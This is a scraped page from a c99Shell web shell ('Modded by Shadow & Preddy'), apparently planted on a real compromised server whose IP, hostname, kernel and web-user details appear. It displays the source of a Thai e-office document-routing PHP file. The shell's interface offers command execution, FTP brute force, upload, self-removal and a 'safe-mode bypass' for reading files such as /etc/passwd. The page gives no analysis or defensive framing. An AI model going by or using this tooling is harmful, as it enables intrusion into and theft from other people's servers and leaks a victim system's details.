110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/person/admin/ drwxr-xr-x Free 52.32 GB of 127.8 GB (40.94%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/person/admin/ drwxr-xr-x
Free 52.32 GB of 127.8 GB (40.94%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: processReSendDocSR.php (3.96 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?php
include_once("../../class/clsConnection.php");
include_once("../../class/clsDB.php");
include_once "../global.php";
include_once "../class/clsDepartment.php";
include_once "../class/clsPerson.php";
include_once "../link/function.php";
include_once "../link/functionshow.php";
include_once "../class/clsDocLinePosition.php";
include_once "../class/clsDocLineConfig.php";
include_once "../class/clsReceiveSendType.php";
include_once "../class/clsDocType.php";
include_once "../class/clsDocSpeedLevel.php";
include_once "../class/clsDocSecreLevel.php";
include_once "../class/clsDocattatchesTmp.php";
include_once "../class/clsDocuments.php";
include_once "../class/clsDocattatches.php";
include_once "../class/clsDocReceiveSend.php";
include_once "../class/clsRunningDoc.php";
include_once "funct.php";
include_once "../class/clspsdept.php";
include_once "../class/clsDocSendtoPsTmp.php";
include_once "../class/clsCollegeDetail.php";
include_once "../class/clsSendReceive.php";
include_once "programTSR.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDP = new Department($oC);
$oDP2 = new Department($oC);
$oDP3 = new Department($oC);
$oDP4 = new Department($oC);
$oDP5 = new Department($oC);
$oDPt = new Department($oC);
$oDPt2 = new Department($oC);
$oDPt3 = new Department($oC);
$oDPt4 = new Department($oC);
$oDPt = new Department($oC);
$oDPt2 = new Department($oC);
$oDPt3 = new Department($oC);
$oDPt4 = new Department($oC);
$oPS = new person($oC);
$oPS2 = new person($oC);
$oPS3 = new person($oC);
$oPS4 = new person($oC);
$oDlc = new DocLineConfig($oC);
$oDlc2 = new DocLineConfig($oC);
$oDlc3 = new DocLineConfig($oC);
$oDlp = new docLinePosition($oC);
$oDlp1 = new docLinePosition($oC);
$oRSt = new receiveSendType($oC);
$oDt = new doctype($oC);
$oDsl = new DocSpeedLevel($oC);
$oDcl = new DocSecretLevel($oC);
$oDtmp = new DocattatchesTmp($oC);
$oDoc = new Documents($oC);
$oDoc2 = new Documents($oC);
$oDoc3 = new Documents($oC);
$oDoc4 = new Documents($oC);
$oDoc5 = new Documents($oC);
$oDatt = new Docattatches($oC);
$oDatt2 = new Docattatches($oC);
$oRs = new DocReceiveSend($oC);
$oRs1 = new DocReceiveSend($oC);
$oRs2 = new DocReceiveSend($oC);
$oRs3 = new DocReceiveSend($oC);
$oRs4 = new DocReceiveSend($oC);
$oRs5 = new DocReceiveSend($oC);
$oRd = new runningdoc($oC);
$oStmp=new DocSendToPsTmp($oC);
$oPSd = new psdept($oC);
$oCd = new collegedetail($oC);
$oTsr = new sendreceive($oC);
$oTsre = new sendreceive($oC);

$MaxDocGroup=$oDP->SearchMaxDocGroup();

if($m=="1"){   //re senddocSR

			senddocSR($tsr_id);
			//echo "<meta http-equiv='refresh' content='0; URL=sendReceiveDoc.php'>";
?>
			<script language="JavaScript">
			parent.location.href ="sendReceiveDoc.php?page_id2=<? echo $page_id2;?>";
			</script>
<?
}else if($m=="2"){
			$oTsr->SearchByKey($tsr_id);
			$oTsr->GetRecord();
				
			$oCd->SearchByKey($oTsr->tsr_to_node);
			$oCd->GetRecord();
								
			$msg='?fn=checkr3r4&tsr_id_send='.$tsr_id.'&tsr_fr_node='.$oTsr->tsr_fr_node;
			
			if($oTsr->tsr_to_node==99){ 
					$folder=$GLOBALS["FOLDERFORSEND1"];
			}else if($oTsr->tsr_to_node==8){ 
					$folder=$GLOBALS["FOLDERFORSEND3"]; 
			}else{ 
					$folder=$GLOBALS["FOLDERFORSEND2"]; 
			}
			$path_send='http://'.$oCd->collegeHost.'/'.$folder.'/'.'eoffice/admin/receiveTSR.php'.$msg;
			$res=file_get_contents($path_send);
			if($res=="r3" || $res=="r4"){					
						$oTsr->Edit();
						$oTsr->tsr_status='s3';
						$oTsr->Save();
			}			
			//echo "<meta http-equiv='refresh' content='0; URL=sendReceiveDoc.php'>";
?>
			<script language="JavaScript">
			parent.location.href ="sendReceiveDoc.php?page_id2=<? echo $page_id2;?>";
			</script>
<?
}else if($m=="3"){
			$oTsr->Deletetsr_id($tsr_id);
?>
			<script language="JavaScript">
			parent.location.href ="sendReceiveDoc.php?page_id2=<? echo $page_id2;?>";
			</script>
<?
}
?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]--